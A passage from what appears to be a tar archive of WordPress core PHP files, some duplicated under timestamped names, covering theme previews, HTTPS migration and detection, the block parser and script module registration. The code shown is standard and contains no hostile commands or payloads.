* Theme previews using the Site Editor for block themes.
*
* @package WordPress
*/
/**
* Filters the blog option to return the path for the previewed theme.
*
* @since 6.3.0
*
* @param string $current_stylesheet The current theme's stylesheet or template path.
* @return string The previewed theme's stylesheet or template path.
*/
function wp_get_theme_preview_path( $current_stylesheet = null ) {
if ( ! current_user_can( 'switch_themes' ) ) {
return $current_stylesheet;
}
$preview_stylesheet = ! empty( $_GET['wp_theme_preview'] ) ? sanitize_text_field( wp_unslash( $_GET['wp_theme_preview'] ) ) : null;
$wp_theme = wp_get_theme( $preview_stylesheet );
if ( ! is_wp_error( $wp_theme->errors() ) ) {
if ( current_filter() === 'template' ) {
$theme_path = $wp_theme->get_template();
} else {
$theme_path = $wp_theme->get_stylesheet();
}
return sanitize_text_field( $theme_path );
}
return $current_stylesheet;
}
/**
* Adds a middleware to `apiFetch` to set the theme for the preview.
* This adds a `wp_theme_preview` URL parameter to API requests from the Site Editor, so they also respond as if the theme is set to the value of the parameter.
*
* @since 6.3.0
*/
function wp_attach_theme_preview_middleware() {
// Don't allow non-admins to preview themes.
if ( ! current_user_can( 'switch_themes' ) ) {
return;
}
wp_add_inline_script(
'wp-api-fetch',
sprintf(
'wp.apiFetch.use( wp.apiFetch.createThemePreviewMiddleware( %s ) );',
wp_json_encode( sanitize_text_field( wp_unslash( $_GET['wp_theme_preview'] ) ), JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
),
'after'
);
}
/**
* Set a JavaScript constant for theme activation.
*
* Sets the JavaScript global WP_BLOCK_THEME_ACTIVATE_NONCE containing the nonce
* required to activate a theme. For use within the site editor.
*
* @see https://github.com/WordPress/gutenberg/pull/41836
*
* @since 6.3.0
* @access private
*/
function wp_block_theme_activate_nonce() {
$nonce_handle = 'switch-theme_' . wp_get_theme_preview_path();
?>
<script type="text/javascript">
window.WP_BLOCK_THEME_ACTIVATE_NONCE = <?php echo wp_json_encode( wp_create_nonce( $nonce_handle ), JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ); ?>;
</script>
<?php
}
/**
* Add filters and actions to enable Block Theme Previews in the Site Editor.
*
* The filters and actions should be added after `pluggable.php` is included as they may
* trigger code that uses `current_user_can()` which requires functionality from `pluggable.php`.
*
* @since 6.3.2
*/
function wp_initialize_theme_preview_hooks() {
if ( ! empty( $_GET['wp_theme_preview'] ) ) {
add_filter( 'stylesheet', 'wp_get_theme_preview_path' );
add_filter( 'template', 'wp_get_theme_preview_path' );
add_action( 'init', 'wp_attach_theme_preview_middleware' );
add_action( 'admin_head', 'wp_block_theme_activate_nonce' );
}
}
https-migration-20260605170851-20260621081201-20260621145631.php 0000666 00000011205 15224151221 0014734 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class.wp-scripts-20260605054255-20260621200858.php 0000666 00000000527 15224151221 0013455 0 ustar 00 <?php
/**
* Dependencies API: WP_Scripts class
*
* This file is deprecated, use 'wp-includes/class-wp-scripts.php' instead.
*
* @deprecated 6.1.0
* @package WordPress
*/
_deprecated_file( basename( __FILE__ ), '6.1.0', WPINC . '/class-wp-scripts.php' );
/** WP_Scripts class */
require_once ABSPATH . WPINC . '/class-wp-scripts.php';
class-wp-block-parser.php 0000666 00000026374 15224151221 0011403 0 ustar 00 <?php
/**
* Block Serialization Parser
*
* @package WordPress
*/
/**
* Class WP_Block_Parser
*
* Parses a document and constructs a list of parsed block objects
*
* @since 5.0.0
* @since 4.0.0 returns arrays not objects, all attributes are arrays
*/
class WP_Block_Parser {
/**
* Input document being parsed
*
* @example "Pre-text\n<!-- wp:paragraph -->This is inside a block!<!-- /wp:paragraph -->"
*
* @since 5.0.0
* @var string
*/
public $document;
/**
* Tracks parsing progress through document
*
* @since 5.0.0
* @var int
*/
public $offset;
/**
* List of parsed blocks
*
* @since 5.0.0
* @var array[]
*/
public $output;
/**
* Stack of partially-parsed structures in memory during parse
*
* @since 5.0.0
* @var WP_Block_Parser_Frame[]
*/
public $stack;
/**
* Parses a document and returns a list of block structures
*
* When encountering an invalid parse will return a best-effort
* parse. In contrast to the specification parser this does not
* return an error on invalid inputs.
*
* @since 5.0.0
*
* @param string $document Input document being parsed.
* @return array[]
*/
public function parse( $document ) {
$this->document = $document;
$this->offset = 0;
$this->output = array();
$this->stack = array();
while ( $this->proceed() ) {
continue;
}
return $this->output;
}
/**
* Processes the next token from the input document
* and returns whether to proceed eating more tokens
*
* This is the "next step" function that essentially
* takes a token as its input and decides what to do
* with that token before descending deeper into a
* nested block tree or continuing along the document
* or breaking out of a level of nesting.
*
* @internal
* @since 5.0.0
* @return bool
*/
public function proceed() {
$next_token = $this->next_token();
list( $token_type, $block_name, $attrs, $start_offset, $token_length ) = $next_token;
$stack_depth = count( $this->stack );
// we may have some HTML soup before the next block.
$leading_html_start = $start_offset > $this->offset ? $this->offset : null;
switch ( $token_type ) {
case 'no-more-tokens':
// if not in a block then flush output.
if ( 0 === $stack_depth ) {
$this->add_freeform();
return false;
}
/*
* Otherwise we have a problem
* This is an error
*
* we have options
* - treat it all as freeform text
* - assume an implicit closer (easiest when not nesting)
*/
// for the easy case we'll assume an implicit closer.
if ( 1 === $stack_depth ) {
$this->add_block_from_stack();
return false;
}
/*
* for the nested case where it's more difficult we'll
* have to assume that multiple closers are missing
* and so we'll collapse the whole stack piecewise
*/
while ( 0 < count( $this->stack ) ) {
$this->add_block_from_stack();
}
return false;
case 'void-block':
/*
* easy case is if we stumbled upon a void block
* in the top-level of the document
*/
if ( 0 === $stack_depth ) {
if ( isset( $leading_html_start ) ) {
$this->output[] = (array) $this->freeform(
substr(
$this->document,
$leading_html_start,
$start_offset - $leading_html_start
)
);
}
$this->output[] = (array) new WP_Block_Parser_Block( $block_name, $attrs, array(), '', array() );
$this->offset = $start_offset + $token_length;
return true;
}
// otherwise we found an inner block.
$this->add_inner_block(
new WP_Block_Parser_Block( $block_name, $attrs, array(), '', array() ),
$start_offset,
$token_length
);
$this->offset = $start_offset + $token_length;
return true;
case 'block-opener':
// track all newly-opened blocks on the stack.
array_push(
$this->stack,
new WP_Block_Parser_Frame(
new WP_Block_Parser_Block( $block_name, $attrs, array(), '', array() ),
$start_offset,
$token_length,
$start_offset + $token_length,
$leading_html_start
)
);
$this->offset = $start_offset + $token_length;
return true;
case 'block-closer':
/*
* if we're missing an opener we're in trouble
* This is an error
*/
if ( 0 === $stack_depth ) {
/*
* we have options
* - assume an implicit opener
* - assume _this_ is the opener
* - give up and close out the document
*/
$this->add_freeform();
return false;
}
// if we're not nesting then this is easy - close the block.
if ( 1 === $stack_depth ) {
$this->add_block_from_stack( $start_offset );
$this->offset = $start_offset + $token_length;
return true;
}
/*
* otherwise we're nested and we have to close out the current
* block and add it as a new innerBlock to the parent
*/
$stack_top = array_pop( $this->stack );
$html = substr( $this->document, $stack_top->prev_offset, $start_offset - $stack_top->prev_offset );
$stack_top->block->innerHTML .= $html;
$stack_top->block->innerContent[] = $html;
$stack_top->prev_offset = $start_offset + $token_length;
$this->add_inner_block(
$stack_top->block,
$stack_top->token_start,
$stack_top->token_length,
$start_offset + $token_length
);
$this->offset = $start_offset + $token_length;
return true;
default:
// This is an error.
$this->add_freeform();
return false;
}
}
/**
* Scans the document from where we last left off
* and finds the next valid token to parse if it exists
*
* Returns the type of the find: kind of find, block information, attributes
*
* @internal
* @since 5.0.0
* @since 4.6.1 fixed a bug in attribute parsing which caused catastrophic backtracking on invalid block comments
* @return array
*/
public function next_token() {
$matches = null;
/*
* aye the magic
* we're using a single RegExp to tokenize the block comment delimiters
* we're also using a trick here because the only difference between a
* block opener and a block closer is the leading `/` before `wp:` (and
* a closer has no attributes). we can trap them both and process the
* match back in PHP to see which one it was.
*/
$has_match = preg_match(
'/<!--\s+(?P<closer>\/)?wp:(?P<namespace>[a-z][a-z0-9_-]*\/)?(?P<name>[a-z][a-z0-9_-]*)\s+(?P<attrs>{(?:(?:[^}]+|}+(?=})|(?!}\s+\/?-->).)*+)?}\s+)?(?P<void>\/)?-->/s',
$this->document,
$matches,
PREG_OFFSET_CAPTURE,
$this->offset
);
// if we get here we probably have catastrophic backtracking or out-of-memory in the PCRE.
if ( false === $has_match ) {
return array( 'no-more-tokens', null, null, null, null );
}
// we have no more tokens.
if ( 0 === $has_match ) {
return array( 'no-more-tokens', null, null, null, null );
}
list( $match, $started_at ) = $matches[0];
$length = strlen( $match );
$is_closer = isset( $matches['closer'] ) && -1 !== $matches['closer'][1];
$is_void = isset( $matches['void'] ) && -1 !== $matches['void'][1];
$namespace = $matches['namespace'];
$namespace = ( isset( $namespace ) && -1 !== $namespace[1] ) ? $namespace[0] : 'core/';
$name = $namespace . $matches['name'][0];
$has_attrs = isset( $matches['attrs'] ) && -1 !== $matches['attrs'][1];
/*
* Fun fact! It's not trivial in PHP to create "an empty associative array" since all arrays
* are associative arrays. If we use `array()` we get a JSON `[]`
*/
$attrs = $has_attrs
? json_decode( $matches['attrs'][0], /* as-associative */ true )
: array();
/*
* This state isn't allowed
* This is an error
*/
if ( $is_closer && ( $is_void || $has_attrs ) ) {
// we can ignore them since they don't hurt anything.
}
if ( $is_void ) {
return array( 'void-block', $name, $attrs, $started_at, $length );
}
if ( $is_closer ) {
return array( 'block-closer', $name, null, $started_at, $length );
}
return array( 'block-opener', $name, $attrs, $started_at, $length );
}
/**
* Returns a new block object for freeform HTML
*
* @internal
* @since 5.0.0
*
* @param string $inner_html HTML content of block.
* @return WP_Block_Parser_Block freeform block object.
*/
public function freeform( $inner_html ) {
return new WP_Block_Parser_Block( null, array(), array(), $inner_html, array( $inner_html ) );
}
/**
* Pushes a length of text from the input document
* to the output list as a freeform block.
*
* @internal
* @since 5.0.0
* @param null $length how many bytes of document text to output.
*/
public function add_freeform( $length = null ) {
$length = $length ? $length : strlen( $this->document ) - $this->offset;
if ( 0 === $length ) {
return;
}
$this->output[] = (array) $this->freeform( substr( $this->document, $this->offset, $length ) );
}
/**
* Given a block structure from memory pushes
* a new block to the output list.
*
* @internal
* @since 5.0.0
* @param WP_Block_Parser_Block $block The block to add to the output.
* @param int $token_start Byte offset into the document where the first token for the block starts.
* @param int $token_length Byte length of entire block from start of opening token to end of closing token.
* @param int|null $last_offset Last byte offset into document if continuing form earlier output.
*/
public function add_inner_block( WP_Block_Parser_Block $block, $token_start, $token_length, $last_offset = null ) {
$parent = $this->stack[ count( $this->stack ) - 1 ];
$parent->block->innerBlocks[] = (array) $block;
$html = substr( $this->document, $parent->prev_offset, $token_start - $parent->prev_offset );
if ( ! empty( $html ) ) {
$parent->block->innerHTML .= $html;
$parent->block->innerContent[] = $html;
}
$parent->block->innerContent[] = null;
$parent->prev_offset = $last_offset ? $last_offset : $token_start + $token_length;
}
/**
* Pushes the top block from the parsing stack to the output list.
*
* @internal
* @since 5.0.0
* @param int|null $end_offset byte offset into document for where we should stop sending text output as HTML.
*/
public function add_block_from_stack( $end_offset = null ) {
$stack_top = array_pop( $this->stack );
$prev_offset = $stack_top->prev_offset;
$html = isset( $end_offset )
? substr( $this->document, $prev_offset, $end_offset - $prev_offset )
: substr( $this->document, $prev_offset );
if ( ! empty( $html ) ) {
$stack_top->block->innerHTML .= $html;
$stack_top->block->innerContent[] = $html;
}
if ( isset( $stack_top->leading_html_start ) ) {
$this->output[] = (array) $this->freeform(
substr(
$this->document,
$stack_top->leading_html_start,
$stack_top->token_start - $stack_top->leading_html_start
)
);
}
$this->output[] = (array) $stack_top->block;
}
}
/**
* WP_Block_Parser_Block class.
*
* Required for backward compatibility in WordPress Core.
*/
require_once __DIR__ . '/class-wp-block-parser-block.php';
/**
* WP_Block_Parser_Frame class.
*
* Required for backward compatibility in WordPress Core.
*/
require_once __DIR__ . '/class-wp-block-parser-frame.php';
theme-previews.php 0000666 00000005536 15224151221 0010231 0 ustar 00 <?php
/**
* Theme previews using the Site Editor for block themes.
*
* @package WordPress
*/
/**
* Filters the blog option to return the path for the previewed theme.
*
* @since 6.3.0
*
* @param string $current_stylesheet The current theme's stylesheet or template path.
* @return string The previewed theme's stylesheet or template path.
*/
function wp_get_theme_preview_path( $current_stylesheet = null ) {
if ( ! current_user_can( 'switch_themes' ) ) {
return $current_stylesheet;
}
$preview_stylesheet = ! empty( $_GET['wp_theme_preview'] ) ? sanitize_text_field( wp_unslash( $_GET['wp_theme_preview'] ) ) : null;
$wp_theme = wp_get_theme( $preview_stylesheet );
if ( ! is_wp_error( $wp_theme->errors() ) ) {
if ( current_filter() === 'template' ) {
$theme_path = $wp_theme->get_template();
} else {
$theme_path = $wp_theme->get_stylesheet();
}
return sanitize_text_field( $theme_path );
}
return $current_stylesheet;
}
/**
* Adds a middleware to `apiFetch` to set the theme for the preview.
* This adds a `wp_theme_preview` URL parameter to API requests from the Site Editor, so they also respond as if the theme is set to the value of the parameter.
*
* @since 6.3.0
*/
function wp_attach_theme_preview_middleware() {
// Don't allow non-admins to preview themes.
if ( ! current_user_can( 'switch_themes' ) ) {
return;
}
wp_add_inline_script(
'wp-api-fetch',
sprintf(
'wp.apiFetch.use( wp.apiFetch.createThemePreviewMiddleware( %s ) );',
wp_json_encode( sanitize_text_field( wp_unslash( $_GET['wp_theme_preview'] ) ), JSON_HEX_TAG | JSON_UNESCAPED_SLASHES )
),
'after'
);
}
/**
* Set a JavaScript constant for theme activation.
*
* Sets the JavaScript global WP_BLOCK_THEME_ACTIVATE_NONCE containing the nonce
* required to activate a theme. For use within the site editor.
*
* @see https://github.com/WordPress/gutenberg/pull/41836
*
* @since 6.3.0
* @access private
*/
function wp_block_theme_activate_nonce() {
$nonce_handle = 'switch-theme_' . wp_get_theme_preview_path();
?>
<script type="text/javascript">
window.WP_BLOCK_THEME_ACTIVATE_NONCE = <?php echo wp_json_encode( wp_create_nonce( $nonce_handle ), JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ); ?>;
</script>
<?php
}
/**
* Add filters and actions to enable Block Theme Previews in the Site Editor.
*
* The filters and actions should be added after `pluggable.php` is included as they may
* trigger code that uses `current_user_can()` which requires functionality from `pluggable.php`.
*
* @since 6.3.2
*/
function wp_initialize_theme_preview_hooks() {
if ( ! empty( $_GET['wp_theme_preview'] ) ) {
add_filter( 'stylesheet', 'wp_get_theme_preview_path' );
add_filter( 'template', 'wp_get_theme_preview_path' );
add_action( 'init', 'wp_attach_theme_preview_middleware' );
add_action( 'admin_head', 'wp_block_theme_activate_nonce' );
}
}
https-detection-20260605111237.php 0000666 00000013341 15224151221 0011755 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
script-modules-20260605020157.php 0000666 00000023267 15224151221 0011621 0 ustar 00 <?php
/**
* Script Modules API: Script Module functions
*
* @since 6.5.0
*
* @package WordPress
* @subpackage Script Modules
*/
/**
* Retrieves the main WP_Script_Modules instance.
*
* This function provides access to the WP_Script_Modules instance, creating one
* if it doesn't exist yet.
*
* @since 6.5.0
*
* @global WP_Script_Modules $wp_script_modules
*
* @return WP_Script_Modules The main WP_Script_Modules instance.
*/
function wp_script_modules(): WP_Script_Modules {
global $wp_script_modules;
if ( ! ( $wp_script_modules instanceof WP_Script_Modules ) ) {
$wp_script_modules = new WP_Script_Modules();
}
return $wp_script_modules;
}
/**
* Registers the script module if no script module with that script module
* identifier has already been registered.
*
* @since 6.5.0
* @since 6.9.0 Added the $args parameter.
*
* @param string $id The identifier of the script module. Should be unique. It will be used in the
* final import map.
* @param string $src Optional. Full URL of the script module, or path of the script module relative
* to the WordPress root directory. If it is provided and the script module has
* not been registered yet, it will be registered.
* @param array $deps {
* Optional. List of dependencies.
*
* @type string|array ...$0 {
* An array of script module identifiers of the dependencies of this script
* module. The dependencies can be strings or arrays. If they are arrays,
* they need an `id` key with the script module identifier, and can contain
* an `import` key with either `static` or `dynamic`. By default,
* dependencies that don't contain an `import` key are considered static.
*
* @type string $id The script module identifier.
* @type string $import Optional. Import type. May be either `static` or
* `dynamic`. Defaults to `static`.
* }
* }
* @param string|false|null $version Optional. String specifying the script module version number. Defaults to false.
* It is added to the URL as a query string for cache busting purposes. If $version
* is set to false, the version number is the currently installed WordPress version.
* If $version is set to null, no version is added.
* @param array $args {
* Optional. An array of additional args. Default empty array.
*
* @type bool $in_footer Whether to print the script module in the footer. Only relevant to block themes. Default 'false'. Optional.
* @type 'auto'|'low'|'high' $fetchpriority Fetch priority. Default 'auto'. Optional.
* }
*/
function wp_register_script_module( string $id, string $src, array $deps = array(), $version = false, array $args = array() ) {
wp_script_modules()->register( $id, $src, $deps, $version, $args );
}
/**
* Marks the script module to be enqueued in the page.
*
* If a src is provided and the script module has not been registered yet, it
* will be registered.
*
* @since 6.5.0
* @since 6.9.0 Added the $args parameter.
*
* @param string $id The identifier of the script module. Should be unique. It will be used in the
* final import map.
* @param string $src Optional. Full URL of the script module, or path of the script module relative
* to the WordPress root directory. If it is provided and the script module has
* not been registered yet, it will be registered.
* @param array $deps {
* Optional. List of dependencies.
*
* @type string|array ...$0 {
* An array of script module identifiers of the dependencies of this script
* module. The dependencies can be strings or arrays. If they are arrays,
* they need an `id` key with the script module identifier, and can contain
* an `import` key with either `static` or `dynamic`. By default,
* dependencies that don't contain an `import` key are considered static.
*
* @type string $id The script module identifier.
* @type string $import Optional. Import type. May be either `static` or
* `dynamic`. Defaults to `static`.
* }
* }
* @param string|false|null $version Optional. String specifying the script module version number. Defaults to false.
* It is added to the URL as a query string for cache busting purposes. If $version
* is set to false, the version number is the currently installed WordPress version.
* If $version is set to null, no version is added.
* @param array $args {
* Optional. An array of additional args. Default empty array.
*
* @type bool $in_footer Whether to print the script module in the footer. Only relevant to block themes. Default 'false'. Optional.
* @type 'auto'|'low'|'high' $fetchpriority Fetch priority. Default 'auto'. Optional.
* }
*/
function wp_enqueue_script_module( string $id, string $src = '', array $deps = array(), $version = false, array $args = array() ) {
wp_script_modules()->enqueue( $id, $src, $deps, $version, $args );
}
/**
* Unmarks the script module so it is no longer enqueued in the page.
*
* @since 6.5.0
*
* @param string $id The identifier of the script module.
*/
function wp_dequeue_script_module( string $id ) {
wp_script_modules()->dequeue( $id );
}
/**
* Deregisters the script module.
*
* @since 6.5.0
*
* @param string $id The identifier of the script module.
*/
function wp_deregister_script_module( string $id ) {
wp_script_modules()->deregister( $id );
}
/**
* Registers all the default WordPress Script Modules.
*
* @since 6.7.0
*/
function wp_default_script_modules() {
$suffix = defined( 'WP_RUN_CORE_TESTS' ) ? '.min' : wp_scripts_get_suffix();
/*
* Expects multidimensional array like:
*
* 'interactivity/index.min.js' => array('dependencies' => array(…), 'version' => '…'),
* 'interactivity/debug.min.js' => array('dependencies' => array(…), 'version' => '…'),
* 'interactivity-router/index.min.js' => …
*/
$assets = include ABSPATH . WPINC . "/assets/script-modules-packages{$suffix}.php";
foreach ( $assets as $file_name => $script_module_data ) {
/*
* Build the WordPress Script Module ID from the file name.
* Prepend `@wordpress/` and remove extensions and `/index` if present:
* - interactivity/index.min.js => @wordpress/interactivity
* - interactivity/debug.min.js => @wordpress/interactivity/debug
* - block-library/query/view.js => @wordpress/block-library/query/view
*/
$script_module_id = '@wordpress/' . preg_replace( '~(?:/index)?(?:\.min)?\.js$~D', '', $file_name, 1 );
switch ( $script_module_id ) {
/*
* Interactivity exposes two entrypoints, "/index" and "/debug".
* "/debug" should replace "/index" in development.
*/
case '@wordpress/interactivity/debug':
if ( ! SCRIPT_DEBUG ) {
continue 2;
}
$script_module_id = '@wordpress/interactivity';
break;
case '@wordpress/interactivity':
if ( SCRIPT_DEBUG ) {
continue 2;
}
break;
}
/*
* The Interactivity API is designed with server-side rendering as its primary goal, so all of its script modules
* should be loaded with low fetchpriority and printed in the footer since they should not be needed in the
* critical rendering path. Also, the @wordpress/a11y script module is intended to be used as a dynamic import
* dependency, in which case the fetchpriority is irrelevant. See <https://make.wordpress.org/core/2024/10/14/updates-to-script-modules-in-6-7/>.
* However, in case it is added as a static import dependency, the fetchpriority is explicitly set to be 'low'
* since the module should not be involved in the critical rendering path, and if it is, its fetchpriority will
* be bumped to match the fetchpriority of the dependent script.
*/
$args = array();
if (
str_starts_with( $script_module_id, '@wordpress/interactivity' ) ||
str_starts_with( $script_module_id, '@wordpress/block-library' ) ||
'@wordpress/a11y' === $script_module_id
) {
$args['fetchpriority'] = 'low';
$args['in_footer'] = true;
}
// Marks all Core blocks as compatible with client-side navigation.
if ( str_starts_with( $script_module_id, '@wordpress/block-library' ) ) {
wp_interactivity()->add_client_navigation_support_to_script_module( $script_module_id );
}
$path = includes_url( "js/dist/script-modules/{$file_name}" );
wp_register_script_module( $script_module_id, $path, $script_module_data['dependencies'], $script_module_data['version'], $args );
}
}
class-wp-block-parser-20260621094000.php 0000666 00000026374 15224151221 0012760 0 ustar 00 <?php
/**
* Block Serialization Parser
*
* @package WordPress
*/
/**
* Class WP_Block_Parser
*
* Parses a document and constructs a list of parsed block objects
*
* @since 5.0.0
* @since 4.0.0 returns arrays not objects, all attributes are arrays
*/
class WP_Block_Parser {
/**
* Input document being parsed
*
* @example "Pre-text\n<!-- wp:paragraph -->This is inside a block!<!-- /wp:paragraph -->"
*
* @since 5.0.0
* @var string
*/
public $document;
/**
* Tracks parsing progress through document
*
* @since 5.0.0
* @var int
*/
public $offset;
/**
* List of parsed blocks
*
* @since 5.0.0
* @var array[]
*/
public $output;
/**
* Stack of partially-parsed structures in memory during parse
*
* @since 5.0.0
* @var WP_Block_Parser_Frame[]
*/
public $stack;
/**
* Parses a document and returns a list of block structures
*
* When encountering an invalid parse will return a best-effort
* parse. In contrast to the specification parser this does not
* return an error on invalid inputs.
*
* @since 5.0.0
*
* @param string $document Input document being parsed.
* @return array[]
*/
public function parse( $document ) {
$this->document = $document;
$this->offset = 0;
$this->output = array();
$this->stack = array();
while ( $this->proceed() ) {
continue;
}
